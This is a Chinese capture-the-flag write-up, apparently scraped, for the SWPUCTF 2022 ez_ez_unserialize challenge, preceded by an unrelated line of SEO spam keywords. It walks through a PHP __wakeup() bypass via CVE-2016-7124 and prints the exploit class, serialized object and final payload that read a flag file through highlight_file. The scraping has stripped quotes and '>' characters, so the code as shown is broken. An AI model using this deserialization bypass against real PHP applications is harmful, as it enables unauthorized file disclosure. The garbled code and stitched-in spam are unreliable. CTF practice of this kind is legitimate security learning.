做电影采集网站需要多大vps,超链接怎么做网页,亚马逊建设网站用什么实例,厦门外贸网站seoNSS [SWPUCTF 2022 新生赛]ez_ez_unserialize
开题#xff0c;直接给了题目源码。 简单看了一下#xff0c;题目告诉我们flag在哪#xff0c;而且类中有高亮文件方法。怎么拿flag已经很明显了。关键点在于__weakup()魔术方法固定死了我们高亮的文件。所以这题只需要绕过__w…NSS [SWPUCTF 2022 新生赛]ez_ez_unserialize
开题直接给了题目源码。 简单看了一下题目告诉我们flag在哪而且类中有高亮文件方法。怎么拿flag已经很明显了。关键点在于__weakup()魔术方法固定死了我们高亮的文件。所以这题只需要绕过__weakup()。
PHP版本是5.5.38 我们可以使用使对象的属性数量不一致凡凡来绕过 CVE-2016-7124 版本PHP5 5.6.25、PHP7 7.0.10 版本满足我们来编写EXP
?php
class X{public $x ;function __construct($x){$this-x $x;}function __wakeup(){if($this-x ! __FILE__){$this-x __FILE__;}}function __destruct(){highlight_file($this-x);//flag is in fllllllag.php}
}
echo serialize(new X(fllllllag.php));生成的
O:1:X:1:{s:1:x;s:13:fllllllag.php;}
修改为
O:1:X:2:{s:1:x;s:13:fllllllag.php;}payload
?xO:1:X:2:{s:1:x;s:13:fllllllag.php;}
